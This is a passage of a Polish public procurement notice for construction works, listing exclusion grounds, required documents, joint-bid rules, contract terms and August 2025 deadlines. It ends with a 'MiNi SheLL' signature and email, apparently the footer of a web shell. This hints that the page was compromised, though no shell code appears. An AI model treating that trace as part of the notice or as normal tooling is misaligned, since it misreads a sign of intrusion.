dnia 7 lipca 1994 roku Prawo budowlane (Dz. U. z 2025 r. poz. 418)<br/>osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub <br/>stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji <br/>technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym <br/>zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich <br/>nadaniu i w oparciu o przepisy będące podstawą ich nadania.<br/>Ponadto zgodnie z art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane samodzielne funkcje <br/>techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje <br/>zawodowe zostały uznane na zasadach określonych w przepisach odrębnych, tj. ustawie z dnia <br/>22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach <br/>członkowskich Unii Europejskiej (Dz.U. z 2023r. poz. 334) oraz ustawie z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023 poz. 551 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">12.1. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców z zastrzeżeniem art. <br/>110 ust. 2 ustawy Prawo zamówień publicznych (Pzp), w stosunku, do których zachodzi <br/>którakolwiek z okoliczności wskazanych w art. 108 ust. 1 Prawo zamówień publicznych oraz <br/>z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w przypadkach, o których <br/>mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w <br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie <br/>bezpieczeństwa narodowego (Dz.U. 2025, poz. 514). Do Wykonawcy podlegającego <br/>wykluczeniu w tym zakresie, stosuje się art. 7 ust. 3 wspomnianej ustawy.<br/>12.2. Wykluczenie Wykonawcy następuje:<br/>1) w przypadkach, o których mowa w art. 108 ust. 1 pkt 1 lit. a-g i pkt 2 Pzp, na okres 5 lat od <br/>dnia uprawomocnienia się wyroku potwierdzającego zaistnienie jednej z podstaw <br/>wykluczenia, chyba że w tym wyroku został określony inny okres wykluczenia;<br/>2) w przypadkach, o których mowa w art. 108 ust. 1 pkt 1 lit. h i pkt 2 Pzp, gdy osoba, o której <br/>mowa w tych przepisach, została skazana za przestępstwo wymienione <br/>w art. 108 ust. 1 pkt 1 lit. h Pzp,<br/>- na okres 3 lat od dnia uprawomocnienia się odpowiednio wyroku potwierdzającego <br/>zaistnienie jednej z podstaw wykluczenia, wydania ostatecznej decyzji lub zaistnienia <br/>zdarzenia będącego podstawą wykluczenia, chyba że w wyroku lub decyzji został <br/>określony inny okres wykluczenia;<br/>3) w przypadku, o którym mowa w art. 108 ust. 1 pkt 4 Pzp, na okres, na jaki został <br/>prawomocnie orzeczony zakaz ubiegania się o zamówienia publiczne;<br/>4) w przypadkach, o których mowa w art. 108 ust. 1 pkt 5 Pzp, na okres 3 lat od zaistnienia <br/>zdarzenia będącego podstawą wykluczenia;<br/><br/>14.3 Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na ich dzień złożenia14.4 Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 poz. 1616), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o <br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie z zał. nr 8 do SWZ;2) wykaz robót bud. wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty zgodnie z załącznikiem nr 5 do SWZ.<br/>W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jedno wspólne w/w oświadczenie.<br/>3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z zał. nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">14.1 Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>1) oświadczenie o spełnianiu warunków udziału w postępowaniu- zgodnie z załącznikiem <br/>nr 2 do SWZ;<br/>2) oświadczenia o braku podstaw do wykluczenia z postępowania– zgodnie z <br/>załącznikiem nr 3 do SWZ.<br/>14.2 Oświadczenia, o którym mowa w pkt 14.1 SWZ, potwierdzające brak podstaw do <br/>wykluczenia, spełnianie warunków udziału w postępowaniu odpowiednio na dzień składania <br/>ofert, tymczasowo zastępują wymagane przez Zamawiającego podmiotowe środki <br/>dowodowe. <br/>14.3 Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na ich dzień złożenia.<br/>14.4 Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku <br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia <br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 poz. 1616), <br/>z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o <br/>dopuszczenie do udziału w postępowaniu, albo oświadczenia o <br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami <br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku <br/>o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy <br/>należącego do tej samej grupy kapitałowej – zgodnie z załącznikiem nr 8 do SWZ 2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, <br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz <br/>z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz <br/>których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te <br/>roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, <br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego <br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od <br/>niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty zgodnie z załącznikiem nr 5 do SWZ.<br/>W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jedno <br/>wspólne w/w oświadczenie.<br/>3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub <br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji <br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania <br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz <br/>informacją o podstawie do dysponowania tymi osobami – zgodnie z załącznikiem <br/>nr 6 do SWZ.<br/>W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jedno <br/>wspólne w/w oświadczenie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z zapisami SWZ dostępnymi na stronie internetowej: https://platformazakupowa.pl/pn/lasy_wejherowo <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 15.16. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>15.16.1 Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu <br/>i zawarcia umowy. Do oferty wspólnej Wykonawcy dołączają pełnomocnictwo. <br/>15.16.2 Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego <br/>Zamawiający kieruje informacje, korespondencję, itp. <br/>15.16.3 Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać <br/>następujące wymagania: <br/>a) oferta wspólna powinna być sporządzona zgodnie z SWZ, <br/>b) sposób składania dokumentów w ofercie wspólnej:<br/>dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw <br/>do wykluczenia składa każdy z Wykonawców składających ofertę wspólną we <br/>własnym imieniu; <br/>dokumenty wspólne takie jak np.: formularz ofertowy, dokumenty podmiotowe <br/>i przedmiotowe składa pełnomocnik Wykonawców w imieniu wszystkich <br/>Wykonawców składających ofertę wspólną, za wyjątkiem oświadczenie o <br/>przynależności do grupy kapitałowej, <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych w załączniku nr 9.<br/>7.1 Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną <br/>wprowadzone do treści umowy stanowią załącznik nr 9 SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">15.4. Oferta ma być złożona przy użyciu środka komunikacji elektronicznej. Środkiem komunikacji elektronicznej, służącym prawidłowemu złożeniu oferty przez Wykonawcę, jest Platforma Przetargowa Open Nexus dostępna pod adresem: https://platformazakupowa.pl/pn/lasy_wejherowo oznaczonym tytułem oraz znakiem sprawy zgodnym z niniejszym postępowaniem.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-05 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Szczegóły zamówienia zostały określone w SWZ, dostępnym na stronie: https://platformazakupowa.pl/pn/lasy_wejherowo<br/>22.1. Zamawiający nie dopuszcza możliwości składania ofert częściowych.<br/>22.2. Przedmiotowe zamówienie, z uwagi na opis przedmiotu zamówienia i postawione warunki udziału w postępowaniu,<br/>jest zamówieniem skierowanym do wykonawców z sektora małych i średnich przedsiębiorstw, którzy to mogą sobie poradzić<br/>z tym w sumie niewielkim zamówieniem. Ponadto niniejsze zamówienie dotyczy robót budowlanych, objętych projektem<br/>budowalnym.<br/>Zadanie realizowane jest jako jedno, brak wykonania jednej z branż powoduje, że całe zadanie nie zostanie wykonane<br/>zgodnie z założeniami i potrzebami zamawiającego. Specyfika przedmiotu zamówienia, stanowiącego logiczny ciąg<br/>następujących po sobie etapów realizacji sprawia, że nieuzasadnionym staje się podział zamówienia na „nienaturalne”<br/>części, co mogłoby spowodować nadmierne trudności jego realizacji, a w konsekwencji niepotrzebne, dodatkowe koszty dla<br/>Zamawiającego lub nawet fiasko całości zamierzenia objętego tym zamówieniem.<br/>24.1. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.<br/>27.1. Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie wykonawców, o których<br/>mowa w art. 94 Prawa zamówień publicznych.<br/>29.1. Zamawiający nie przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Prawo zamówień<br/>publicznych.<br/>30.1. Zamawiający nie wymaga odbycia przez Wykonawcę wizji lokalnej lub sprawdzenia przez niego dokumentów<br/>niezbędnych do realizacji zamówienia.<br/>31.1. Zamawiający nie przewiduje możliwości prowadzenia rozliczeń w walutach obcych.<br/>31.2. Rozliczenia między Zamawiającym a Wykonawcą będą prowadzone w złotych polskich (PLN).<br/>31.3. Zamawiający nie przewiduje możliwości udzielenia zaliczek na poczet wykonania zamówienia.<br/>32.1. Zamawiający nie przewiduje zawrotu kosztów udziału w postępowaniu, z zastrzeżeniem art. 261 PZP<br/>33.1. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań.<br/>33.2. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy (podwykonawcom).

Creat By MiNi SheLL
Email: jattceo@gmail.com